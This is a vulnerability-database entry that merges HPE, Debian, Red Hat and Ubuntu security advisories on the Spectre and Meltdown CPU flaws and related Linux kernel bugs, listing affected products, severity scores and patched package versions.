Search criteria ⓘ Use full-text search for keyword queries.
Combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by dates instead of relevance.

Full-Text Search

Vendor

Product

Assigner

Sources

Sort by

Order

Apply ordering (override relevance)

423 vulnerabilities found for solidfire by netapp

VAR-201801-1712

Vulnerability from variot - Updated: 2026-04-10 23:37

Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. Two vulnerabilities are identified, known as "Variant 3a" and "Variant 4". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Meltdown vulnerability exists in the CPU processor core, which \"melts\" the security boundary implemented by hardware, allowing low-privileged user-level applications to \"cross-border\" access to system-level memory, causing data leakage. Multiple CPU Hardware are prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. The following products and versions are affected: ARM Cortex-R7; Cortex-R8; Cortex-A8; Cortex-A9; Cortex-A12; Xeon CPU E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4 ; Xeon E3-1245 v2, v3, v5, v6 versions; Xeon X7542, etc. Relevant releases/architectures:

RHEL 7-based RHEV-H ELS - noarch RHEV Hypervisor for RHEL-6 ELS - noarch

The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03805en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbhf03805en_us Version: 5

HPESBHF03805 rev.5 - Certain HPE products using Microprocessors from Intel, AMD, and ARM, with Speculative Execution, Elevation of Privilege and Information Disclosure.

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2018-01-18 Last Updated: 2018-01-17

Potential Security Impact: Local: Disclosure of Information, Elevation of Privilege

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY On January 3 2018, side-channel security vulnerabilities involving speculative execution were publicly disclosed. These vulnerabilities may impact the listed HPE products, potentially leading to information disclosure and elevation of privilege. Mitigation and resolution of these vulnerabilities may call for both an operating system update, provided by the OS vendor, and a system ROM update from HPE.

Note:

This issue takes advantage of techniques commonly used in many modern processor architectures.
For further information, microprocessor vendors have provided security advisories:

References:

PSRT110635
PSRT110634
PSRT110633
PSRT110632
CVE-2017-5715 - aka Spectre, branch target injection
CVE-2017-5753 - aka Spectre, bounds check bypass
CVE-2017-5754 - aka Meltdown, rogue data cache load, memory access permission check performed after kernel memory read

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HPE ProLiant DL380 Gen10 Server prior to v1.28
HPE ProLiant DL180 Gen10 Server prior to v1.28
HPE ProLiant DL160 Gen10 Server prior to v1.28
HPE ProLiant DL360 Gen10 Server prior to v1.28
HPE ProLiant ML110 Gen10 Server prior to v1.28
HPE ProLiant DL580 Gen10 Server prior to v1.28
HPE ProLiant DL560 Gen10 Server prior to v1.28
HPE ProLiant DL120 Gen10 Server prior to v1.28
HPE ProLiant ML350 Gen10 Server prior to v1.28
HPE ProLiant XL450 Gen10 Server prior to v1.28
HPE Synergy 660 Gen10 Compute Module prior to v1.28
HPE ProLiant XL170r Gen10 Server prior to v1.28
HPE ProLiant BL460c Gen10 Server Blade prior to v1.28
HPE ProLiant XL190r Gen10 Server prior to v1.28
HPE ProLiant XL230k Gen10 Server prior to v1.28
HPE ProLiant DL385 Gen10 Server prior to v1.04
HPE Synergy 480 Gen10 Compute Module prior to v1.28
HPE ProLiant ML350 Gen10 Server prior to v1.28
HPE ProLiant XL730f Gen9 Server To be delivered
HPE ProLiant XL230a Gen9 Server To be delivered
HPE ProLiant XL740f Gen9 Server To be delivered
HPE ProLiant XL750f Gen9 Server To be delivered
HPE ProLiant XL170r Gen9 Server To be delivered
HP ProLiant DL60 Gen9 Server To be delivered
HPE ProLiant XL450 Gen9 Server To be delivered
HP ProLiant DL160 Gen9 Server To be delivered
HPE Apollo 4200 Gen9 Server To be delivered
HP ProLiant BL460c Gen9 Server Blade To be delivered
HP ProLiant ML110 Gen9 Server To be delivered
HP ProLiant ML150 Gen9 Server To be delivered
HPE ProLiant ML350 Gen9 Server To be delivered
HP ProLiant DL380 Gen9 Server To be delivered
HP ProLiant DL120 Gen9 Server To be delivered
HPE ProLiant DL560 Gen9 Server To be delivered
HP ProLiant BL660c Gen9 Server To be delivered
HPE ProLiant DL20 Gen9 Server To be delivered
HPE Synergy 660 Gen9 Compute Module To be delivered
HPE Synergy 480 Gen9 Compute Module To be delivered
HPE ProLiant ML30 Gen9 Server To be delivered
HPE ProLiant XL250a Gen9 Server To be delivered
HPE ProLiant XL190r Gen9 Server To be delivered
HP ProLiant DL80 Gen9 Server To be delivered
HPE ProLiant DL180 Gen9 Server To be delivered
HPE ProLiant XL270d Gen9 Accelerator Tray 2U Configure-to-order Server To be delivered
HPE ProLiant WS460c Gen9 Workstation To be delivered
HPE ProLiant XL260a Gen9 Server To be delivered
HPE Synergy 620 Gen9 Compute Module To be delivered
HPE ProLiant DL580 Gen9 Server To be delivered
HPE Synergy 680 Gen9 Compute Module To be delivered
HPE ProLiant m510 Server Cartridge prior to v1.62
HPE ProLiant m710p Server Cartridge prior to v12/12/2017
HPE ProLiant m710x Server Cartridge prior to v1.60
HP ProLiant m710 Server Cartridge prior to 12/12/2017 (v1.60)
HPE Synergy Composer prior to 12/12/2017
HPE Integrity Superdome X with BL920s Blades prior to 8.8.6
HP ProLiant DL360 Gen9 Server prior to 2.3.110
HPE ProLiant Thin Micro TM200 Server prior to 1/16/2017
HPE ProLiant ML10 v2 Server prior to 12/12/2017
HPE ProLiant m350 Server Cartridge prior to v1/15/2018
HPE ProLiant m300 Server Cartridge prior to v1/15/2018
HPE ProLiant MicroServer Gen8 prior to 12/12/2017
HPE ProLiant ML310e Gen8 v2 Server prior to v12/12/2017

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2017-5715
  8.2 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
  6.8 (AV:A/AC:L/Au:N/C:C/I:P/A:N)

CVE-2017-5753
  5.0 CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L
  5.4 (AV:A/AC:M/Au:N/C:P/I:P/A:P)

CVE-2017-5754
  7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following system ROM updates which include an updated microcode to resolve the vulnerability:

HPE has provided a customer bulletin https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00039267en_us with specific instructions to obtain the udpated sytem ROM
Note:
- CVE-2017-5715 (Variant 2) requires that the System ROM be updated and a vendor supplied operating system update be applied as well.
- For CVE-2017-5753, CVE-2017-5754 (Variants 1 and 3) require only updates of a vendor supplied operating system.
- HPE will continue to add additional products to the list.

HISTORY

Version:1 (rev.1) - 4 January 2018 Initial release

Version:2 (rev.2) - 5 January 2018 Added additional impacted products

Version:3 (rev.3) - 10 January 2018 Added more impacted products

Version:4 (rev.4) - 9 January 2018 Fixed product ID

Version:5 (rev.5) - 18 January 2018 Added additional impacted products

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX

Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-4187-1 security@debian.org https://www.debian.org/security/ Ben Hutchings May 01, 2018 https://www.debian.org/security/faq

Package : linux CVE ID : CVE-2015-9016 CVE-2017-0861 CVE-2017-5715 CVE-2017-5753 CVE-2017-13166 CVE-2017-13220 CVE-2017-16526 CVE-2017-16911 CVE-2017-16912 CVE-2017-16913 CVE-2017-16914 CVE-2017-18017 CVE-2017-18203 CVE-2017-18216 CVE-2017-18232 CVE-2017-18241 CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-5332 CVE-2018-5333 CVE-2018-5750 CVE-2018-5803 CVE-2018-6927 CVE-2018-7492 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757 CVE-2018-7995 CVE-2018-8781 CVE-2018-8822 CVE-2018-1000004 CVE-2018-1000199

Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

CVE-2015-9016

Ming Lei reported a race condition in the multiqueue block layer
(blk-mq).  On a system with a driver using blk-mq (mtip32xx,
null_blk, or virtio_blk), a local user might be able to use this
for denial of service or possibly for privilege escalation.

CVE-2017-0861

Robb Glasser reported a potential use-after-free in the ALSA (sound)
PCM core.  We believe this was not possible in practice.

CVE-2017-5715

Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.

This specific attack has been named Spectre variant 2 (branch
target injection) and is mitigated for the x86 architecture (amd64
and i386) by using the "retpoline" compiler feature which allows
indirect branches to be isolated from speculative execution.

CVE-2017-5753

Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.

This specific attack has been named Spectre variant 1
(bounds-check bypass) and is mitigated by identifying vulnerable
code sections (array bounds checking followed by array access) and
replacing the array access with the speculation-safe
array_index_nospec() function.

More use sites will be added over time.

CVE-2017-13166

A bug in the 32-bit compatibility layer of the v4l2 ioctl handling
code has been found. Memory protections ensuring user-provided
buffers always point to userland memory were disabled, allowing
destination addresses to be in kernel space. On a 64-bit kernel a
local user with access to a suitable video device can exploit this
to overwrite kernel memory, leading to privilege escalation.

CVE-2017-13220

Al Viro reported that the Bluetooth HIDP implementation could
dereference a pointer before performing the necessary type check. 
A local user could use this to cause a denial of service.

CVE-2017-16526

Andrey Konovalov reported that the UWB subsystem may dereference
an invalid pointer in an error case.  A local user might be able
to use this for denial of service.

CVE-2017-16911

Secunia Research reported that the USB/IP vhci_hcd driver exposed
kernel heap addresses to local users.

CVE-2017-16912

Secunia Research reported that the USB/IP stub driver failed to
perform a range check on a received packet header field, leading
to an out-of-bounds read.  A remote user able to connect to the
USB/IP server could use this for denial of service.

CVE-2017-16913

Secunia Research reported that the USB/IP stub driver failed to
perform a range check on a received packet header field, leading
to excessive memory allocation.  A remote user able to connect to
the USB/IP server could use this for denial of service.

CVE-2017-16914

Secunia Research reported that the USB/IP stub driver failed to
check for an invalid combination of fields in a received packet,
leading to a null pointer dereference.  A remote user able to
connect to the USB/IP server could use this for denial of service.

CVE-2017-18017

Denys Fedoryshchenko reported that the netfilter xt_TCPMSS module
failed to validate TCP header lengths, potentially leading to a
use-after-free.  If this module is loaded, it could be used by a
remote attacker for denial of service or possibly for code
execution.

CVE-2017-18203

Hou Tao reported that there was a race condition in creation and
deletion of device-mapper (DM) devices.  A local user could
potentially use this for denial of service.

CVE-2017-18216

Alex Chen reported that the OCFS2 filesystem failed to hold a
necessary lock during nodemanager sysfs file operations,
potentially leading to a null pointer dereference.  A local user
could use this for denial of service.

CVE-2017-18232

Jason Yan reported a race condition in the SAS (Serial-Attached
SCSI) subsystem, between probing and destroying a port.  This
could lead to a deadlock.  A physically present attacker could
use this to cause a denial of service.

CVE-2017-18241

Yunlei He reported that the f2fs implementation does not properly
initialise its state if the "noflush_merge" mount option is used. 
A local user with access to a filesystem mounted with this option
could use this to cause a denial of service.

CVE-2018-1066

Dan Aloni reported to Red Hat that the CIFS client implementation
would dereference a null pointer if the server sent an invalid
response during NTLMSSP setup negotiation.  This could be used
by a malicious server for denial of service.

CVE-2018-1068

The syzkaller tool found that the 32-bit compatibility layer of
ebtables did not sufficiently validate offset values. On a 64-bit
kernel, a local user with the CAP_NET_ADMIN capability (in any user
namespace) could use this to overwrite kernel memory, possibly
leading to privilege escalation. Debian disables unprivileged user
namespaces by default.

CVE-2018-1092

Wen Xu reported that a crafted ext4 filesystem image would
trigger a null dereference when mounted.  A local user able
to mount arbitrary filesystems could use this for denial of
service.

CVE-2018-5332

Mohamed Ghannam reported that the RDS protocol did not
sufficiently validate RDMA requests, leading to an out-of-bounds
write.  A local attacker on a system with the rds module loaded
could use this for denial of service or possibly for privilege
escalation.

CVE-2018-5333

Mohamed Ghannam reported that the RDS protocol did not properly
handle an error case, leading to a null pointer dereference.  A
local attacker on a system with the rds module loaded could
possibly use this for denial of service.

CVE-2018-5750

Wang Qize reported that the ACPI sbshc driver logged a kernel heap
address.

CVE-2018-5803

Alexey Kodanev reported that the SCTP protocol did not range-check
the length of chunks to be created.  A local or remote user could
use this to cause a denial of service.

CVE-2018-6927

Li Jinyue reported that the FUTEX_REQUEUE operation on futexes did
not check for negative parameter values, which might lead to a
denial of service or other security impact.

CVE-2018-7492

The syzkaller tool found that the RDS protocol was lacking a null
pointer check.  A local attacker on a system with the rds module
loaded could use this for denial of service.

CVE-2018-7566

Fan LongFei reported a race condition in the ALSA (sound)
sequencer core, between write and ioctl operations.  This could
lead to an out-of-bounds access or use-after-free.  A local user
with access to a sequencer device could use this for denial of
service or possibly for privilege escalation.

CVE-2018-7740

Nic Losby reported that the hugetlbfs filesystem's mmap operation
did not properly range-check the file offset.  A local user with
access to files on a hugetlbfs filesystem could use this to cause
a denial of service.

CVE-2018-7757

Jason Yan reported a memory leak in the SAS (Serial-Attached
SCSI) subsystem.  A local user on a system with SAS devices
could use this to cause a denial of service.

CVE-2018-7995

Seunghun Han reported a race condition in the x86 MCE
(Machine Check Exception) driver.  This is unlikely to have
any security impact.

CVE-2018-8781

Eyal Itkin reported that the udl (DisplayLink) driver's mmap
operation did not properly range-check the file offset.  A local
user with access to a udl framebuffer device could exploit this to
overwrite kernel memory, leading to privilege escalation.

CVE-2018-8822

Dr Silvio Cesare of InfoSect reported that the ncpfs client
implementation did not validate reply lengths from the server.  An
ncpfs server could use this to cause a denial of service or
remote code execution in the client.

CVE-2018-1000004

Luo Quan reported a race condition in the ALSA (sound) sequencer
core, between multiple ioctl operations.  This could lead to a
deadlock or use-after-free.  A local user with access to a
sequencer device could use this for denial of service or possibly
for privilege escalation.

CVE-2018-1000199

Andy Lutomirski discovered that the ptrace subsystem did not
sufficiently validate hardware breakpoint settings.  Local users
can use this to cause a denial of service, or possibly for
privilege escalation, on x86 (amd64 and i386) and possibly other
architectures.

For the oldstable distribution (jessie), these problems have been fixed in version 3.16.56-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron61fFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Rtqw//Xf/L4bP65wU9M59Ef6xBt+Eph+yxeMsioGhu80ODdMemlmHzASMtfZjY AXxyt9l8lbHn8MmwDA4aLhhwHYXwvKATdpHSy1SILrRfb4s9P9uV1vsHaIeZ649E hDyNon9hP2tPso6BwqiYHZZy9Xxtd+T8vTBeBZwUKOLBkBRvV/gyNSUdJWp6L8WH aF4D1hHl9ZotDkyIvkubbx77aqbJ88I4R0n69x7L9udFbuXa+U7hV6dJdnpzyl/7 OukJfEtnkaUgWu0MdOfFss6iH5OQISn/y/ricRi29oKQiEp3YwnT5J9pFwSQeJJS H8ABVt251UoS0J+of3QWw0muOT/6UAF8SNpPKMJXC7Euq8pTmYVPSIeUYf4eqn65 UHZSCKXaszItq+uzVNYdkj504BJ4cG1lFxZtlrFWwKE8p7QOETN0GKvTRdu/SvDd Hl2nb4HouLpBYS518Th2/MGgzhXXAuO12MH3smenptZbqxKn9Z0XSTJYzFupgJk/ kKF2xkDFBE4toTLVE+6XdUKwYk4vkeDZyOGOwRYThSkKAzrUh5zThgal4HnknD2A 5ye4XLhjgSIT47/nmor6lhxd7WGXGkV33GF0azYlHr/sclfzxcU2Ev3NUBWQ8M3s CxfIO0FNCzO0WIUf40md7MlIAnDBIRGyYgNIIe7AnSRKKPykEx8= =wNQS -----END PGP SIGNATURE----- . Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

Security Fix(es):

An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited.

Note: This issue is present in hardware and cannot be fully fixed via software update. The updated kernel packages provide software mitigation for this hardware issue at a cost of potential performance penalty. Please refer to References section for further information about this issue and the performance impact.

In this update mitigations for x86-64 architecture are provided.

Variant CVE-2017-5753 triggers the speculative execution by performing a bounds-check bypass. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall boundary and read privileged memory by conducting targeted cache side-channel attacks. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important)

Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instruction permission faults, exception generation triggered by a faulting access is suppressed until the retirement of the whole instruction block. In a combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. (CVE-2017-5754, Important)

Note: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64 microprocessors are not affected by this issue.

Red Hat would like to thank Google Project Zero for reporting these issues.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

Bugs fixed (https://bugzilla.redhat.com/):

1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass 1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection 1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling

Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

i386: kernel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-devel-2.6.32-696.18.7.el6.i686.rpm kernel-headers-2.6.32-696.18.7.el6.i686.rpm perf-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

x86_64: kernel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm kernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm kernel-devel-2.6.32-696.18.7.el6.x86_64.rpm kernel-headers-2.6.32-696.18.7.el6.x86_64.rpm perf-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm python-perf-2.6.32-696.18.7.el6.i686.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm python-perf-2.6.32-696.18.7.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

ppc64: kernel-2.6.32-696.18.7.el6.ppc64.rpm kernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm kernel-devel-2.6.32-696.18.7.el6.ppc64.rpm kernel-headers-2.6.32-696.18.7.el6.ppc64.rpm perf-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm

s390x: kernel-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-devel-2.6.32-696.18.7.el6.s390x.rpm kernel-headers-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm perf-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

ppc64: kernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm python-perf-2.6.32-696.18.7.el6.ppc64.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm python-perf-2.6.32-696.18.7.el6.s390x.rpm python-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-696.18.7.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm kernel-doc-2.6.32-696.18.7.el6.noarch.rpm kernel-firmware-2.6.32-696.18.7.el6.noarch.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/speculativeexecution https://access.redhat.com/security/cve/CVE-2017-5753 https://access.redhat.com/security/cve/CVE-2017-5715 https://access.redhat.com/security/cve/CVE-2017-5754

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O OR+iGnoY+cALbsBWKwbmzQM= =V4ow -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Relevant releases/architectures:

Image Updates for RHV-H - noarch Management Agent for RHEL 7 Hosts - noarch

The appliance is available to download as an OVA file from the Customer Portal. 6.5) - x86_64
7) - noarch, x86_64
Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. ========================================================================== Ubuntu Security Notice USN-3541-2 January 23, 2018

linux-hwe, linux-azure, linux-gcp, linux-oem vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 16.04 LTS

Summary:

Several security issues were addressed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS. This flaw is known as Spectre. (CVE-2017-5715, CVE-2017-5753)

USN-3523-2 mitigated CVE-2017-5754 (Meltdown) for the amd64 architecture in the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS. This flaw is known as Meltdown. (CVE-2017-5754)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 LTS: linux-image-4.13.0-1006-azure 4.13.0-1006.8 linux-image-4.13.0-1007-gcp 4.13.0-1007.10 linux-image-4.13.0-1017-oem 4.13.0-1017.18 linux-image-4.13.0-31-generic 4.13.0-31.34~16.04.1 linux-image-4.13.0-31-lowlatency 4.13.0-31.34~16.04.1 linux-image-azure 4.13.0.1006.7 linux-image-gcp 4.13.0.1007.9 linux-image-generic-hwe-16.04 4.13.0.31.51 linux-image-gke 4.13.0.1007.9 linux-image-lowlatency-hwe-16.04 4.13.0.31.51 linux-image-oem 4.13.0.1017.21

